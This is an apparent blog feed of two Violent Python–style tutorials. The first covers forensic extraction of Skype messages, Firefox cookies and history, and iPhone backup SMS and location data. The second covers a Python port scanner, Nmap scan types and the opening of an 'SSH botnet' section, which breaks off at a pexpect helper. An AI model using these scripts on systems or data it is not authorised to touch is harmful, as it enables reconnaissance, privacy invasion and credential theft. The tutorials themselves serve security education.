<p>To output only the records in the Messages table that involve a specific <code class="language-plaintext highlighter-rouge">&lt;SKYPE-PARTNER&gt;</code>:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="nb">datetime</span><span class="p">(</span><span class="nb">timestamp</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">),</span> <span class="n">dialog_partner</span><span class="p">,</span> <span class="n">author</span><span class="p">,</span> <span class="n">body_xml</span> <span class="k">FROM</span> <span class="n">Messages</span> <span class="k">WHERE</span> <span class="n">dialog_partner</span><span class="o">=</span><span class="s1">'&lt;SKYPE-PARTNER&gt;'</span>
</code></pre></div></div>

<p>To delete the records that involve a specific <code class="language-plaintext highlighter-rouge">&lt;SKYPE-PARTNER&gt;</code>:</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">DELETE</span> <span class="k">FROM</span> <span class="n">messages</span> <span class="k">WHERE</span> <span class="n">skypename</span><span class="o">=</span><span class="s1">'&lt;SKYPE-PARTNER&gt;'</span>
</code></pre></div></div>
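
<p>When the partner name comes from user input, it is safer to pass it as a bound parameter than to paste it into the SQL string. The sketch below shows the idea on an in-memory database. The <code class="language-plaintext highlighter-rouge">Messages</code> table here carries only the four columns used in the text, and the rows and the function name <code class="language-plaintext highlighter-rouge">messages_with</code> are made up.</p>

```python
import sqlite3


def messages_with(conn, partner):
    """Return all messages exchanged with one dialog partner."""
    # The ? placeholder lets sqlite3 quote the value, so a name containing
    # quotes cannot change the meaning of the query.
    cursor = conn.execute(
        "SELECT datetime(timestamp, 'unixepoch'), dialog_partner, author, body_xml "
        "FROM Messages WHERE dialog_partner = ?",
        (partner,),
    )
    return cursor.fetchall()


conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE Messages (timestamp INTEGER, dialog_partner TEXT, author TEXT, body_xml TEXT)")
conn.executemany("INSERT INTO Messages VALUES (?, ?, ?, ?)", [
    (0, "alice", "alice", "hi"),
    (60, "bob", "owner", "hello bob"),
])
rows = messages_with(conn, "alice")
print(rows)
```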

<h3 id="用-python-解析火狐浏览器的-sqlite3-数据库">Parsing Firefox SQLite3 Databases with Python</h3>

<p>On Windows, Firefox stores these databases in the <code class="language-plaintext highlighter-rouge">"C:/Documents and Settings/&lt;USER&gt;/Application Data/Mozilla/Firefox/Profiles/&lt;profile folder&gt;/"</code> directory. On macOS, it stores them in <code class="language-plaintext highlighter-rouge">"/Users/&lt;USER&gt;/Library/Application Support/Firefox/Profiles/&lt;profile folder&gt;"</code>.</p>

<p>The <code class="language-plaintext highlighter-rouge">downloads.sqlite</code> database holds information about the files the Firefox user has downloaded. It contains a single table, <code class="language-plaintext highlighter-rouge">moz_downloads</code>, which records the file name, the source URL, the download time, the file size, the referrer, and the local path where the file was saved.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">sqlite3</span>
<span class="k">def</span> <span class="nf">print_downloads</span><span class="p">(</span><span class="n">download_db</span><span class="p">):</span>
    <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">download_db</span><span class="p">)</span>
    <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
    <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT name, source, datetime(endTime/1000000, 'unixepoch') FROM moz_downloads;"</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] --- Files Downloaded ---"</span><span class="p">)</span>
    <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] File: {} from source: {} at: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">],</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]))</span>
</code></pre></div></div>
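
<p>The query above divides <code class="language-plaintext highlighter-rouge">endTime</code> by 1,000,000 because Firefox records these timestamps in microseconds since the UNIX epoch rather than in seconds. The same conversion can be done on the Python side. The sketch below is one way to do it, with <code class="language-plaintext highlighter-rouge">prtime_to_datetime</code> being a hypothetical helper name.</p>

```python
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


def prtime_to_datetime(microseconds):
    """Convert microseconds since the UNIX epoch to an aware UTC datetime."""
    # timedelta keeps microsecond precision, unlike an integer division.
    return EPOCH + timedelta(microseconds=microseconds)


print(prtime_to_datetime(1262304000000000))
```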

<p>The <code class="language-plaintext highlighter-rouge">moz_cookies</code> table holds the cookie data.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">print_cookies</span><span class="p">(</span><span class="n">cookies_db</span><span class="p">):</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">conn</span> <span class="o">=</span> <span class="n">sqlite3</span><span class="p">.</span><span class="n">connect</span><span class="p">(</span><span class="n">cookies_db</span><span class="p">)</span>
        <span class="n">c</span> <span class="o">=</span> <span class="n">conn</span><span class="p">.</span><span class="n">cursor</span><span class="p">()</span>
        <span class="n">c</span><span class="p">.</span><span class="n">execute</span><span class="p">(</span><span class="s">"SELECT host, name, value FROM moz_cookies"</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] --- Found Cookies ---"</span><span class="p">)</span>
        <span class="k">for</span> <span class="n">row</span> <span class="ow">in</span> <span class="n">c</span><span class="p">:</span>
            <span class="n">host</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span>
            <span class="n">name</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
            <span class="n">value</span> <span class="o">=</span> <span class="n">row</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[+] Host: {}, Cookie: {}, Value: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span>
    <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
        <span class="k">if</span> <span class="s">"encrypted"</span> <span class="ow">in</span> <span class="nb">str</span><span class="p">(</span><span class="n">e</span><span class="p">):</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Error reading your cookies database."</span><span class="p">)</span>
            <span class="k">print</span><span class="p">(</span><span class="s">"[*] Upgrade your Python-Sqlite3 Library"</span><span class="p">)</span>
</code></pre></div></div>

<p>Browsing history is kept in the <code class="language-plaintext highlighter-rouge">places.sqlite</code> database. Its <code class="language-plaintext highlighter-rouge">moz_places</code> table shows which sites (URLs) the user visited and when. The ForensicWiki site recommends combining data from the <code class="language-plaintext highlighter-rouge">moz_places</code> and <code class="language-plaintext highlighter-rouge">moz_historyvisits</code> tables to obtain a true browsing history.</p>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">url</span><span class="p">,</span> <span class="nb">datetime</span><span class="p">(</span><span class="n">visit_date</span><span class="o">/</span><span class="mi">1000000</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">)</span> <span class="k">FROM</span> <span class="n">moz_places</span><span class="p">,</span> <span class="n">moz_historyvisits</span> <span class="k">WHERE</span> <span class="n">visit_count</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="k">AND</span> <span class="n">moz_places</span><span class="p">.</span><span class="n">id</span> <span class="o">==</span> <span class="n">moz_historyvisits</span><span class="p">.</span><span class="n">place_id</span><span class="p">;</span>
</code></pre></div></div>
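
<p>To see what the join produces, the sketch below runs an equivalent query against a small in-memory database. The two tables contain only the columns the query needs, and every row is invented for the demonstration. A real <code class="language-plaintext highlighter-rouge">places.sqlite</code> has many more columns.</p>

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Minimal, hypothetical versions of the two Firefox tables.
conn.executescript("""
    CREATE TABLE moz_places (id INTEGER PRIMARY KEY, url TEXT, visit_count INTEGER);
    CREATE TABLE moz_historyvisits (id INTEGER PRIMARY KEY, place_id INTEGER, visit_date INTEGER);
    INSERT INTO moz_places VALUES (1, 'http://example.com/', 2);
    INSERT INTO moz_places VALUES (2, 'http://example.org/never-visited', 0);
    INSERT INTO moz_historyvisits VALUES (1, 1, 1262304000000000);
    INSERT INTO moz_historyvisits VALUES (2, 1, 1262307600000000);
""")

# One output row per visit: the URL comes from moz_places,
# the visit time from moz_historyvisits.
history = conn.execute(
    "SELECT url, datetime(visit_date / 1000000, 'unixepoch') "
    "FROM moz_places JOIN moz_historyvisits "
    "ON moz_places.id = moz_historyvisits.place_id "
    "WHERE visit_count > 0 ORDER BY visit_date"
).fetchall()
for url, visited in history:
    print(url, visited)
conn.close()
```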

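<h3 id="用-python-调查-itunes-的手机备份">Investigating iTunes Mobile Backups with Python</h3>

<p>Apple's iOS actually tracks and records the device's GPS latitude and longitude and stores them in a database named <code class="language-plaintext highlighter-rouge">consolidated.db</code>. One of its tables, <code class="language-plaintext highlighter-rouge">CellLocation</code>, contains the GPS fixes the phone has collected. When the device is backed up, the copy saved to the computer includes this information as well. Although iOS is designed to delete this location information, investigation found that the data was still present.</p>

<p>When a user backs up an iPhone or iPad, the relevant files are written to a specific directory on the computer. On Windows, iTunes stores the data in the mobile backup directory under the user's profile (<code class="language-plaintext highlighter-rouge">C:/Documents and Settings/&lt;USERNAME&gt;/Application Data/Apple Computer/MobileSync/Backup</code>). On macOS, the directory is <code class="language-plaintext highlighter-rouge">/Users/&lt;USERNAME&gt;/Library/Application Support/MobileSync/Backup/</code>. iTunes places all device backup files in this directory.</p>

<p>To learn more about the files, use the UNIX <code class="language-plaintext highlighter-rouge">file</code> command to identify the type of each one. The backup directory turns out to contain SQLite3 database files, JPEG images, raw binary files, and ASCII text files.</p>

<p>A script can quickly enumerate the table names of every database in the whole backup directory:</p>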

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="n">tbl_name</span> <span class="k">FROM</span> <span class="n">sqlite_master</span> <span class="k">WHERE</span> <span class="k">type</span><span class="o">==</span><span class="nv">"table"</span>
</code></pre></div></div>

<p>Every SQLite database maintains a table named <code class="language-plaintext highlighter-rouge">sqlite_master</code>, which describes the overall structure of the database, including the schema of each table.</p>
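
<p>The two steps above, identifying which backup files are SQLite3 databases and listing their tables, could be combined roughly as follows. This is a sketch under a few assumptions: a file counts as a database when it starts with the 16-byte SQLite 3 header string, and the function names <code class="language-plaintext highlighter-rouge">is_sqlite3</code> and <code class="language-plaintext highlighter-rouge">list_tables</code> are hypothetical.</p>

```python
import os
import sqlite3

# Every SQLite 3 database file begins with this 16-byte header.
SQLITE_MAGIC = b"SQLite format 3\x00"


def is_sqlite3(path):
    """Check the file header instead of relying on the file name."""
    with open(path, "rb") as handle:
        return handle.read(16) == SQLITE_MAGIC


def list_tables(backup_dir):
    """Map each SQLite3 file under backup_dir to the list of its table names."""
    found = {}
    for root, _dirs, files in os.walk(backup_dir):
        for name in files:
            path = os.path.join(root, name)
            if not is_sqlite3(path):
                continue
            conn = sqlite3.connect(path)
            try:
                rows = conn.execute(
                    "SELECT tbl_name FROM sqlite_master WHERE type = 'table'")
                found[path] = [row[0] for row in rows]
            except sqlite3.DatabaseError:
                # Damaged or encrypted databases are skipped.
                pass
            finally:
                conn.close()
    return found
```

<p>Calling <code class="language-plaintext highlighter-rouge">list_tables()</code> on the backup directory returns a dictionary, which makes it easy to search for the database that contains a particular table.</p>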

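<p>The database that contains a <code class="language-plaintext highlighter-rouge">message</code> table is the text message database. The send time, the other party's phone number, and the message itself can be printed with:</p>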

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">SELECT</span> <span class="nb">datetime</span><span class="p">(</span><span class="nb">date</span><span class="p">,</span> <span class="s1">'unixepoch'</span><span class="p">),</span> <span class="n">address</span><span class="p">,</span> <span class="nb">text</span> <span class="k">FROM</span> <span class="n">message</span> <span class="k">WHERE</span> <span class="n">address</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">;</span>
</code></pre></div></div>]]></content><author><name>LI PENGBIN</name><email>cralpbin@gmail.com</email></author><category term="python" /><category term="cybersecurity" /><summary type="html"><![CDATA[Forensic Investigations with Python]]></summary></entry><entry><title type="html">Penetration Testing with Python</title><link href="https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python/" rel="alternate" type="text/html" title="Penetration Testing with Python" /><published>2024-08-14T00:00:00+00:00</published><updated>2024-08-14T00:00:00+00:00</updated><id>https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python</id><content type="html" xml:base="https://crabin.github.io/posts/2024/08/Penetration%20Testing%20with%20Python/"><![CDATA[<h2 id="用-python-进行渗透测试">Penetration Testing with Python</h2>

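<h2 id="编写一个端口扫描器">Writing a Port Scanner</h2>

<p>Python provides an interface to BSD sockets.</p>

<p>A web server is likely to listen on TCP port 80, a mail server on TCP port 25, and an FTP server on TCP port 21.</p>

<h3 id="tcp-全连接扫描">TCP Full-Connect Scan</h3>

<p>To grab the banner of an application on the target host, find an open port, send it a string of data, and wait for the response.</p>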
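
<p>The banner-grabbing step can be tried safely against a service running on the local machine. The sketch below is a minimal, self-contained illustration: it starts a throwaway TCP server on the loopback interface that replies with a made-up banner, then connects to it, sends a probe, and reads the reply. The names <code class="language-plaintext highlighter-rouge">grab_banner</code> and <code class="language-plaintext highlighter-rouge">_demo_server</code>, the probe bytes, and the banner text are all assumptions.</p>

```python
import socket
import threading


def grab_banner(host, port, probe=b"hello\r\n", timeout=2.0):
    """Connect, send a probe, and return up to 100 bytes of the reply."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(probe)
            return sock.recv(100)
    except OSError:
        # Covers refused connections and timeouts: treat the port as closed.
        return None


def _demo_server(listener):
    # Accept one client, read its probe, and answer with a fake banner.
    conn, _addr = listener.accept()
    with conn:
        conn.recv(100)
        conn.sendall(b"220 demo service ready\r\n")


listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
listener.bind(("127.0.0.1", 0))  # port 0 lets the OS pick a free port
listener.listen(1)
port = listener.getsockname()[1]
thread = threading.Thread(target=_demo_server, args=(listener,), daemon=True)
thread.start()

banner = grab_banner("127.0.0.1", port)
thread.join(2.0)
listener.close()
print(banner)
```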

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# version: Python3.X
</span><span class="s">"""
2017.01.29 A port scanner written by following Chapter 2
"""</span>
<span class="kn">import</span> <span class="nn">optparse</span>
<span class="kn">import</span> <span class="nn">socket</span>

<span class="n">__author__</span> <span class="o">=</span> <span class="s">'__L1n__w@tch'</span>


<span class="k">def</span> <span class="nf">initialize</span><span class="p">():</span>
    <span class="n">parser</span> <span class="o">=</span> <span class="n">optparse</span><span class="p">.</span><span class="n">OptionParser</span><span class="p">(</span><span class="s">"usage %prog -H &lt;target host&gt; -p &lt;target port&gt;"</span><span class="p">)</span>

    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-H"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_host"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">str</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target host"</span><span class="p">)</span>
    <span class="n">parser</span><span class="p">.</span><span class="n">add_option</span><span class="p">(</span><span class="s">"-p"</span><span class="p">,</span> <span class="n">dest</span><span class="o">=</span><span class="s">"target_port"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="nb">int</span><span class="p">,</span> <span class="n">help</span><span class="o">=</span><span class="s">"specify target port"</span><span class="p">)</span>

    <span class="n">options</span><span class="p">,</span> <span class="n">args</span> <span class="o">=</span> <span class="n">parser</span><span class="p">.</span><span class="n">parse_args</span><span class="p">()</span>

    <span class="n">target_host</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_host</span>
    <span class="n">target_port</span> <span class="o">=</span> <span class="n">options</span><span class="p">.</span><span class="n">target_port</span>

    <span class="k">if</span> <span class="n">target_host</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="n">target_port</span> <span class="ow">is</span> <span class="bp">None</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">parser</span><span class="p">.</span><span class="n">usage</span><span class="p">)</span>
        <span class="nb">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">return</span> <span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span>


<span class="k">def</span> <span class="nf">connect_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">):</span>
    <span class="s">"""
    TCP full-connect scan
    :param target_host: target host
    :param target_port: target port
    :return:
    """</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">conn_sock</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
        <span class="n">conn_sock</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">))</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] {}/tcp open"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>

        <span class="n">conn_sock</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="sa">b</span><span class="s">"Violent Python"</span><span class="p">)</span>
        <span class="n">results</span> <span class="o">=</span> <span class="n">conn_sock</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Get Response: {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">results</span><span class="p">))</span>
        <span class="n">conn_sock</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
    <span class="k">except</span> <span class="nb">OSError</span><span class="p">:</span>
        <span class="c1"># OSError covers timeouts as well as refused or unreachable connections</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] {}/tcp closed"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>


<span class="k">def</span> <span class="nf">port_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_ports</span><span class="p">):</span>
    <span class="s">"""
    Run the port scan
    :param target_host: target host
    :param target_ports: list of target ports
    :return:
    """</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="n">target_ip</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">gethostbyname</span><span class="p">(</span><span class="n">target_host</span><span class="p">)</span>
    <span class="k">except</span> <span class="n">socket</span><span class="p">.</span><span class="n">gaierror</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[-] Can not resolve {}: Unknown host"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">))</span>
        <span class="k">return</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="n">target_name</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">gethostbyaddr</span><span class="p">(</span><span class="n">target_ip</span><span class="p">)</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan results for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_name</span><span class="p">[</span><span class="mi">0</span><span class="p">]))</span>
    <span class="k">except</span> <span class="nb">OSError</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[+] Scan Results for {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_ip</span><span class="p">))</span>

    <span class="n">socket</span><span class="p">.</span><span class="n">setdefaulttimeout</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>

    <span class="k">for</span> <span class="n">target_port</span> <span class="ow">in</span> <span class="n">target_ports</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="s">"[*] Scanning port {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_port</span><span class="p">))</span>
        <span class="n">connect_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">)</span>


<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>
    <span class="n">host</span><span class="p">,</span> <span class="n">port</span> <span class="o">=</span> <span class="n">initialize</span><span class="p">()</span>
    <span class="n">port_scan</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="p">[</span><span class="n">port</span><span class="p">])</span>

</code></pre></div></div>
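<p>As a complement to the scanner above, here is a minimal sketch of just the open/closed check. It uses <code class="language-plaintext highlighter-rouge">connect_ex()</code>, which reports a refused or timed-out connection as an error code instead of raising an exception. The helper name <code class="language-plaintext highlighter-rouge">is_port_open</code> and its <code class="language-plaintext highlighter-rouge">timeout</code> parameter are illustrative and are not part of the original script.</p>

```python
import socket


def is_port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to (host, port) can be established."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        # connect_ex() returns 0 on success and an errno value otherwise,
        # so refused and timed-out connections do not raise here.
        # An unresolvable host name can still raise socket.gaierror.
        return sock.connect_ex((host, port)) == 0
```

<p>Calling <code class="language-plaintext highlighter-rouge">is_port_open("127.0.0.1", 80)</code> returns a plain boolean, which keeps the per-port logic separate from the printing done in <code class="language-plaintext highlighter-rouge">connect_scan()</code>.</p>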

<h4 id="线程扫描">Threaded Scanning</h4>

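<p>Multithreading speeds up the scan, but it has one drawback: messages printed by different threads can come out garbled and out of order. A semaphore used as a lock solves this: call <code class="language-plaintext highlighter-rouge">acquire()</code> before printing and <code class="language-plaintext highlighter-rouge">release()</code> once printing is done.</p>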

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">threading</span> <span class="kn">import</span> <span class="n">Semaphore</span>

<span class="n">screen_lock</span> <span class="o">=</span> <span class="n">Semaphore</span><span class="p">(</span><span class="n">value</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
<span class="c1"># Acquire before entering try so that finally never releases a lock that was not taken</span>
<span class="n">screen_lock</span><span class="p">.</span><span class="n">acquire</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"print anything"</span><span class="p">)</span>
<span class="k">finally</span><span class="p">:</span>
    <span class="n">screen_lock</span><span class="p">.</span><span class="n">release</span><span class="p">()</span>
</code></pre></div></div>
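<p>The same idea can be sketched end to end with several threads. This version swaps the <code class="language-plaintext highlighter-rouge">Semaphore(value=1)</code> for a <code class="language-plaintext highlighter-rouge">threading.Lock</code> used through a <code class="language-plaintext highlighter-rouge">with</code> block, which behaves the same way for this purpose. The names <code class="language-plaintext highlighter-rouge">report</code>, <code class="language-plaintext highlighter-rouge">scan_all</code>, and <code class="language-plaintext highlighter-rouge">printed</code> are made up for the illustration.</p>

```python
import threading

screen_lock = threading.Lock()
printed = []  # record of the lines that were printed, kept for inspection


def report(port):
    # "with" acquires the lock and releases it on exit, even if the body raises.
    with screen_lock:
        line = "[*] Scanning port {}".format(port)
        print(line)
        printed.append(line)


def scan_all(ports):
    # One thread per port; each thread prints exactly one complete line.
    threads = [threading.Thread(target=report, args=(port,)) for port in ports]
    for thread in threads:
        thread.start()
    for thread in threads:
        thread.join()
```

<p>The order of the lines still depends on thread scheduling; the lock only guarantees that each line is printed whole.</p>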

<h4 id="使用-nmap-端口扫描代码">Port Scanning with Nmap</h4>

<p>Besides the TCP connect scan, other scan types are often needed, such as ACK, RST, FIN, or SYN-ACK scans.</p>

<p>Fyodor Vaskovich wrote Nmap and its associated scripts in C and Lua, but Nmap also integrates well with Python. Nmap can produce XML-based output.</p>

<h5 id="其他端口扫描类型">Other Port Scan Types</h5>

<ul>
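  <li>TCP SYN scan: also called a half-open scan. It sends a SYN packet to start a TCP session and waits for the reply. A reset (RST) packet means the port is closed; a SYN/ACK packet means the port is open.</li>
  <li>TCP NULL scan: sends a packet with none of the flags in the TCP header set. An RST reply means the port is closed.</li>
  <li>TCP FIN scan: sends a FIN packet, which normally tears down an active TCP connection, asking the peer to close the connection. An RST reply means the port is closed.</li>
  <li>TCP XMAS scan: sends a packet with the PSH, FIN, and URG TCP flags set to 1. An RST reply means the port is closed.</li>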
</ul>
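<p>The four probe types above can be summarized as a small lookup table plus a rule for reading the reply. This is only a simplified model, not a packet-level implementation. The names <code class="language-plaintext highlighter-rouge">SCAN_PROBES</code> and <code class="language-plaintext highlighter-rouge">classify</code> are hypothetical. The handling of a missing reply (<code class="language-plaintext highlighter-rouge">filtered</code> and <code class="language-plaintext highlighter-rouge">open|filtered</code>) is an assumption borrowed from Nmap's reporting conventions and is not stated in the list itself.</p>

```python
# TCP flags carried by each probe type described above.
SCAN_PROBES = {
    "syn": {"SYN"},
    "null": set(),
    "fin": {"FIN"},
    "xmas": {"FIN", "PSH", "URG"},
}


def classify(scan_type, reply_flags):
    """Interpret the reply to a probe.

    reply_flags is the set of TCP flag names seen in the reply,
    or None if no reply arrived at all.
    """
    if scan_type not in SCAN_PROBES:
        raise ValueError("unknown scan type: {}".format(scan_type))
    # For every scan type in the list, an RST reply means the port is closed.
    if reply_flags is not None and "RST" in reply_flags:
        return "closed"
    if scan_type == "syn":
        if reply_flags is not None and {"SYN", "ACK"}.issubset(reply_flags):
            return "open"
        return "filtered"
    # NULL, FIN and XMAS: no RST came back, so the port is either open
    # or a firewall silently dropped the probe.
    return "open|filtered"
```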

<hr />

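<p>Once Python-Nmap is installed, Nmap can be imported into an existing script and its scanning features used directly from Python. Create a <code class="language-plaintext highlighter-rouge">PortScanner()</code> object and use it to run the scan. The PortScanner class has a <code class="language-plaintext highlighter-rouge">scan()</code> function that takes the target and a list of ports as arguments and runs a basic Nmap scan against them.</p>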

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">nmap</span>

<span class="k">def</span> <span class="nf">nmap_scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">):</span>
    <span class="n">nm_scan</span> <span class="o">=</span> <span class="n">nmap</span><span class="p">.</span><span class="n">PortScanner</span><span class="p">()</span>
    <span class="n">nm_scan</span><span class="p">.</span><span class="n">scan</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">)</span>
    <span class="n">state</span> <span class="o">=</span> <span class="n">nm_scan</span><span class="p">[</span><span class="n">target_host</span><span class="p">][</span><span class="s">"tcp"</span><span class="p">][</span><span class="nb">int</span><span class="p">(</span><span class="n">target_port</span><span class="p">)][</span><span class="s">"state"</span><span class="p">]</span>
    <span class="k">print</span><span class="p">(</span><span class="s">"[*] {} tcp/{} {}"</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">target_host</span><span class="p">,</span> <span class="n">target_port</span><span class="p">,</span> <span class="n">state</span><span class="p">))</span>
</code></pre></div></div>

<h2 id="用-python-构建一个-ssh-僵尸网络">Building an SSH Botnet with Python</h2>

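<p>The Morris worm of 1988 used three attack vectors, one of which was trying common usernames and passwords against the RSH (remote shell) service. RSH, which was already widely deployed by then, gave system administrators a convenient way to connect to a remote machine and manage it by running a series of terminal commands on the host.</p>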

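<p>Later, a public-key encryption scheme was added to RSH to protect the data it sends over the network. The result was the SSH (Secure Shell) protocol, which eventually replaced RSH.</p>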

<p>SSH worms have proven to be a very successful and common attack vector.</p>

<h3 id="用-pexpect-与-ssh-交互">Interacting with SSH Using Pexpect</h3>

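<p>To drive an interactive console session, use the Pexpect module, which can interact with a program, wait for expected output on the screen, and respond to it.</p>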

<p>The <code class="language-plaintext highlighter-rouge">connect()</code> function below takes a username, a hostname, and a password, and returns the resulting SSH connection.</p>

<p>Once authenticated, a separate <code class="language-plaintext highlighter-rouge">send_command()</code> function sends commands over the SSH session.</p>

<p>Note: this script did not run successfully for me on macOS; see this <a href="http://stackoverflow.com/questions/17879585/eof-when-using-pexpect-and-pxssh">related question</a>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">pexpect</span>

<span class="n">PROMPT</span> <span class="o">=</span> <span class="p">[</span><span class="s">"# "</span><span class="p">,</span> <span class="s">"&gt;&gt;&gt; "</span><span class="p">,</span> <span class="s">"&gt; "</span><span class="p">,</span> <span class="sa">r</span><span class="s">"\$ "</span><span class="p">]</span>

<span class="k">def</span> <span class="nf">send_command</span><span class="p">(</span><span class="n">child</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">child</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">child</span><span class="p">.</span><span class="n">expect</span><span class="p">(</span><span class="n">PROMPT</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">child</span><span class="p">.</span><span class="n">before</span><span class="p">)</span>

